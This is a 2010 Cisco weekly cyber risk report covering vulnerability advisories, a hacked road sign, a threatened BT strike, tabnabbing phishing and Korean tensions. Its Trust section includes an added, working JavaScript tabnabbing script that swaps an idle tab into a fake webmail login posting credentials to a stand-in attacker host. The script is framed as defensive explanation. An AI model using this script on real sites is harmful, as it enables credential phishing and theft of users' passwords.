Cyber Risk Report

May 24–30, 2010

The Cyber Risk Report is a strategic intelligence product that highlights current security activity and mid- to long-range perspectives. The report addresses seven major risk management categories: vulnerability, physical, legal, trust, identity, human, and geopolitical. Cyber Risk Reports are powered by Cisco Security Intelligence Operations, an advanced security infrastructure that identifies, analyzes, and defends against threats to keep organizations informed and protected. Cyber Risk Reports are the collaborative efforts of Cisco security analysts from the following teams: IntelliShield, Applied Intelligence, Remote Management Services, Intrusion Prevention System Signature Development, Cisco Product Security Incident Response, Cisco Malware Research, Strategic Technology Assessment Team, Infrastructure Security Research & Development, IronPort Email and Web Threat Research, Critical Infrastructure Assurance Group, Advanced Services, Security Sales and Engineering, Corporate Security Programs, Government Affairs, and Legal Support.

Vulnerability

Although vulnerability and threat activity during this period was consistent with previous weeks, several major vendors released security advisories and updates, including Cisco, IBM, HP, Adobe, VMware, FreeBSD, and Oracle. Spam volume observed by Cisco Security Intelligence Operations also remains elevated.

Cisco released a security advisory to address multiple vulnerabilities in the Network Building Mediator Framework. The Cisco Network Building Mediator collects data from a variety of sources, including building, IT, energy supply, and energy demand systems and normalizes the data into a common representation. The vulnerabilities include default credentials, privilege escalation, unauthorized information interception, and unauthorized information access. Additional information is available on the Cisco Security Intelligence Operations portal.

A cross-site scripting vulnerability was recently identified in Microsoft Outlook Web Access. Exploitation of this vulnerability could allow an unauthenticated, remote attacker to execute arbitrary HTML or script code in a user's browser. Proof-of-concept code is publicly available, and additional information on the vulnerability is available in IntelliShield Alert 20553.

During the time period, VMware released Security Advisory VMSA-2010-0009 to address a total of 43 vulnerabilities in ESXi utilities and third-party updates for ESX Service Console.

Multiple sources have identified criminal activity surrounding the upcoming FIFA World Cup, which will occur in South Africa from June 11–July 11, 2010. Due to the global popularity of this event, criminals may engage in ticket scams, malicious e-mail messages, spam with embedded hyperlinks to malicious websites, infected legitimate websites, and postings to social networking services. Users who access online information about the matches could expose themselves and even business environments to malicious activity. Increased user awareness and caution, enabling available browser and e-mail security features, and increased filtering and blocking at the network level can mitigate many of these threats.

IntelliShield published 85 events last week: 34 new events and 51 updated events. Of the 85 events, 69 were Vulnerability Alerts, one was a Security Activity Bulletin, two were Security Issue Alerts, 11 were Threat Outbreak Alerts, one was an Applied Mitigation Bulletin, and one was a Cyber Risk Report. The alert publication totals are as follows:

Weekly Alert Totals

Day           Date         New   Updated   Total
Friday        05/28/2010     5        18      23
Thursday      05/27/2010     6         4      10
Wednesday     05/26/2010    14        15      29
Tuesday       05/25/2010     5         2       7
Monday        05/24/2010     4        12      16
Weekly Total                34        51      85


Previous Alerts That Still Represent Significant Risk

Oracle Java Web Start Java Development Kit ActiveX Control Command-Line Injection Vulnerability
IntelliShield Vulnerability Alert 20314, Version 4, May 19, 2010
Urgency/Credibility/Severity Rating: 3/5/4

Oracle Java contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands on the system with the privileges of the user. Systems with Oracle Java JRE and JDK 6 Update 10 and later contain the affected ActiveX control and are vulnerable. Apple has released security updates for Java for Mac OS X 10.6 Update 2 and Java for Mac OS X 10.5. Multiple vendor updates are available.

Kernel Hook Bypassing Engine Affects Multiple Security Applications
IntelliShield Vulnerability Alert 20433, Version 2, May 13, 2010
Urgency/Credibility/Severity Rating: 2/4/4

A security research team has created a tool that bypasses the protections that host-based security software on Microsoft Windows implements through kernel hooks, allowing arbitrary code to execute with kernel privileges. Because the bypass targets the hooking technique rather than a single product, multiple security applications are affected.

DNSSEC-Enabled Queries to the DURZ Serving Root May Affect DNS Services
IntelliShield Vulnerability Alert 20418, Version 1, May 3, 2010
Urgency/Credibility/Severity Rating: 2/5/3

DNSSEC-enabled queries to the root servers may be affected because J-root, the last of the 13 root servers to do so, will begin serving the Deliberately Unvalidatable Root Zone (DURZ) on May 5, 2010. The DURZ returns signed responses that are larger than unsigned ones, so resolvers, firewalls, and middleboxes that cannot handle large DNS responses over UDP or that block DNS over TCP may fail to resolve names.

Microsoft SharePoint Server 2007 Cross-Site Scripting Vulnerability
IntelliShield Vulnerability Alert 20415, Version 2, April 30, 2010
Urgency/Credibility/Severity Rating: 2/5/3

Microsoft SharePoint Server 2007 versions SP2 and prior contain a cross-site scripting vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary HTML or script code in a user's browser. Proof-of-concept code that exploits this vulnerability is publicly available. Microsoft has confirmed this vulnerability, but software updates are not available.

McAfee VirusScan DAT Update May Cause Microsoft Windows System Failure
IntelliShield Vulnerability Alert 20375, Version 2, April 22, 2010
Urgency/Credibility/Severity Rating: 4/5/3

A McAfee DAT file that was distributed to VirusScan applications has caused errors on certain Microsoft Windows XP-based systems. The 5958 DAT file falsely identified the Windows svchost.exe system file as malware; after the file was quarantined or deleted and the system rebooted, affected systems may be rendered unusable. McAfee has released a knowledgebase article with various workarounds.

Transport Layer Security Renegotiation Remote Man-in-the-Middle Attack Vulnerability
IntelliShield Vulnerability Alert 19361, Version 54, May 26, 2010
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2009-3555

Multiple Transport Layer Security (TLS) implementations contain a vulnerability when renegotiating a TLS session that could allow an unauthenticated, remote attacker to conduct a man-in-the-middle attack by injecting plaintext into the beginning of a client's session. Proof-of-concept code that exploits this vulnerability is publicly available. The fix is the secure renegotiation extension defined in RFC 5746; Mozilla and Oracle, in addition to other vendors, have released updates that implement it. Until both endpoints are updated, disabling renegotiation on servers is the usual workaround.

Microsoft Internet Explorer Invalid Pointer Reference Access Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 20052, Version 4, March 30, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-0806

Microsoft has re-released a security advisory and updated software to address the Microsoft Internet Explorer invalid pointer reference access arbitrary code execution vulnerability. Functional exploit code is being used in ongoing attacks, so administrators are advised to apply the updated software from the security bulletin promptly.

Mozilla Firefox WOFF Decoder Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 19968, Version 2, March 23, 2010
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2010-1028

Mozilla Firefox contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code. Mozilla has confirmed this vulnerability and has released updated software.

Microsoft VBScript Unsafe Help File Handling Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 20014, Version 3, April 13, 2010
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2010-0483

Microsoft has released a security advisory with information about affected products to address the Microsoft VBScript unsafe help file handling arbitrary code execution vulnerability, which is exposed through Internet Explorer. Proof-of-concept code that demonstrates code execution is available.

Physical

Digital Signage Threats

In the United States, a movable roadside sign was hacked last week in the state of Florida. The sign was changed from a message that advised drivers of an upcoming exit closure to an ethnically offensive comment. Investigators have not identified the perpetrators and are still unsure how the attack occurred. Because traffic department technicians were not able to remove the message, the sign was eventually disabled.

IntelliShield Analysis: Digital signage is ubiquitous, and many individuals have come to rely on it for a variety of uses, from dangerous road condition warnings and traffic flow control to airport directions. Although physical security on a device like a mobile roadside sign is problematic, passwords are frequently left at the default. Many systems are left unlocked, and many have well-known passwords and password recovery routines. The message on the Florida sign was offensive, but the potential for real harm exists. These signs are intended to warn drivers of potentially hazardous roadway situations; instead, they could display false information or direct motorists into a closed lane or toward an accident. Administrators of these devices are advised to change passwords from their defaults, disable unused remote access, and, where possible, physically secure the control cabinets of these devices.

Legal

Potential British Telecom Strike Could Have Widespread Impact

The threat of a British Telecom (BT) strike could affect Internet and phone connections for thousands of customers. The Communications Workers Union (CWU) announced that up to 60,000 BT workers, many of them engineers, could go on strike unless their salaries are increased by 2 percent. The strike threat follows reports of recent executive bonuses; the CWU's position is that all BT workers should receive a share of the company's bonus compensation packages.

IntelliShield Analysis: Contentious labor relations are not new; however, the fact that British Telecom provides voice and data services to so many customers makes the threat of a strike more daunting. The last BT strike was 23 years ago and predated the ubiquitous use of the Internet. The overall impact of both a voice and Internet outage could be severe and affect how customers and organizations communicate and, more importantly, perform business transactions on a daily basis.

Trust

New Attack Brings Phishing to Browser Tabs

The creative lead for the Mozilla Firefox browser recently described a new attack against web browsers. By detecting when a user stops viewing a particular browser tab, malicious script on an already-open page can rewrite that page's title, favicon, and content so that it appears to be the login prompt for a website, such as a bank or webmail service. The attack, which enables phishing from inside a user's own browser session, bypasses many common antiphishing awareness techniques because the victim never clicks a suspicious link.

IntelliShield Analysis: This attack relies upon the trust that users often place in pages that are already open or frequently left open, like webmail accounts. The attack, which is being referred to as "tabnabbing," leverages the trust that users place in favicons and tab titles rather than in the address bar. The attack can be very convincing when attackers combine it with efforts to detect which sites a user has authenticated to. As web browsing and persistent web application use has pervaded the daily activities of users, efforts that subvert a user's interface and experience may eclipse many reliable antiphishing recommendations. Browsers and security add-ons will adapt to these new techniques; in the interim, users are advised to check the address bar before entering credentials into any page that claims a session has expired, since script on the page cannot change the URL shown there, and to close and reopen common pages rather than logging in again from a tab left open.
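The following is an added example, not code from this report or from Mozilla, that models the tabnabbing mechanism described above so the timing and the swap are concrete. It is the attacker's own page, left open in a background tab: it records when the tab is hidden, and once the tab has stayed hidden for a threshold it rewrites its title, favicon, and body to look like a logged-out webmail page. The decoy hostnames, icon URL, and idle threshold are assumptions for the demo; the browser wiring at the bottom is skipped when the file runs under Node.

```javascript
// Added example (not from the Cyber Risk Report or Mozilla): a minimal model of
// the "tabnabbing" technique. All hostnames, paths and timings are assumptions.

const LOGIN_LOOKALIKE = {
  title: "Sign in - Example Webmail",                    // assumed decoy title
  favicon: "https://attacker.example/webmail-icon.ico",  // assumed decoy icon
  body:
    '<form action="https://attacker.example/collect" method="post">' +
    'Your session expired. Email <input name="u"> ' +
    'Password <input name="p" type="password"> <button>Sign in</button></form>',
};

// `doc` is a small view object with title/favicon/body properties, so the swap
// logic can run and be tested without a browser. Pass a plain object in tests,
// or the browser adapter built at the bottom of the file.
function createTabnabber(doc, opts = {}) {
  const idleMs = opts.idleMs ?? 5000; // how long the tab must stay hidden
  let hiddenSince = null;             // timestamp when the tab went hidden
  let swapped = false;

  return {
    // Tab lost visibility (visibilitychange -> hidden, or window blur).
    onHidden(now) {
      if (hiddenSince === null) hiddenSince = now;
    },
    // Tab became visible again before the swap fired: start over, so the
    // swap only happens after one continuous absence.
    onVisible() {
      if (!swapped) hiddenSince = null;
    },
    // Polled on a timer. Performs the swap once and returns whether it happened.
    tick(now) {
      if (!swapped && hiddenSince !== null && now - hiddenSince >= idleMs) {
        Object.assign(doc, LOGIN_LOOKALIKE); // invokes the adapter's setters
        swapped = true;
      }
      return swapped;
    },
  };
}

// Browser wiring (skipped under Node). The favicon is changed by rewriting the
// <link rel="icon"> href. Script cannot change the address bar, which is why
// checking the URL before typing a password still defeats this attack.
if (typeof document !== "undefined") {
  const view = {
    get title() { return document.title; },
    set title(t) { document.title = t; },
    get favicon() {
      const l = document.querySelector('link[rel~="icon"]');
      return l ? l.href : "";
    },
    set favicon(href) {
      let l = document.querySelector('link[rel~="icon"]');
      if (!l) {
        l = document.createElement("link");
        l.rel = "icon";
        document.head.appendChild(l);
      }
      l.href = href;
    },
    get body() { return document.body.innerHTML; },
    set body(html) { document.body.innerHTML = html; },
  };
  const nab = createTabnabber(view, { idleMs: 5000 });
  document.addEventListener("visibilitychange", () =>
    document.hidden ? nab.onHidden(Date.now()) : nab.onVisible());
  setInterval(() => nab.tick(Date.now()), 500);
}
```

The point for defenders is what the swap cannot touch: the origin in the address bar stays the attacker's, and a password manager keyed on origin will not offer the victim's real credentials on the decoy form. Both are useful checks to train users on alongside the advice above.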

Identity

There was no significant activity in this category during the time period.

Human

There was no significant activity in this category during the time period.

Geopolitical

Korean Peninsula Tensions Heighten Cyber Threat

Tensions on the Korean peninsula are high following a report issued by an international team that blames North Korea for the sinking of a South Korean warship and the deaths of 46 sailors. North Korea denied the charges and severed ties with South Korea, reducing the operations of an industrial complex that employed thousands of North Koreans on manufacturing contracts for South Korean firms. The United States is working to obtain China's support for tougher United Nations Security Council sanctions by offering additional evidence, if requested, of North Korea's culpability. Meanwhile, Chinese Premier Wen Jiabao recently visited South Korea and stressed the need to handle the issue with care and avoid escalation of the situation.

IntelliShield Analysis: Although the probability of full-scale military engagement remains low, an exchange of hostile actions could affect the information technology industry. Renewed missile tests, naval confrontations, and cross-border shelling are plausible, but retaliation could also include cyber attacks against South Korean military or critical infrastructure, or other critical networks that belong to South Korean allies, particularly the United States. As recently as last summer, distributed denial of service attacks against government and military websites in South Korea and the United States were unofficially blamed on North Korea. During past confrontations, outside observers have claimed that North Korea behaved in ways that appear irrational and belligerent. Reports that North Korea's ailing leader recently selected his preferred successor (a son who is young and inexperienced) seem to increase the risk of power plays in the military inner circle. Information security specialists, particularly those defending South Korean and United States government, military, and critical infrastructure networks, are advised to remain on alert until tensions related to this situation ease.

Upcoming Security Activity

Gartner Security & Risk Management Summit: June 21–23, 2010
Cisco Live 2010 (Las Vegas, United States): June 27–July 1, 2010
Black Hat USA (Las Vegas, United States): July 24–29, 2010
DEFCON 18 (Las Vegas, United States): July 29–August 1, 2010
BSides Las Vegas: July 28–29, 2010

Because of the potential for increased risk on multiple vectors, organizations' security teams should be aware of and consider making special preparations for the following dates:

World Expo (Shanghai, China): May 1–October 31, 2010
FIFA World Cup (South Africa): June 11–July 11, 2010
Poland Elections: June 20, 2010
G20 Summit (Toronto, Canada): June 26–27, 2010

Additional Information

For more information about the vulnerabilities contained in this report or the Cisco Security IntelliShield Alert Manager Service, please visit the Cisco Security IntelliShield Alert Manager Service page.

For information on obtaining a free trial of the Cisco Security IntelliShield Alert Manager Service, please visit the Trial Registration page.



This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.
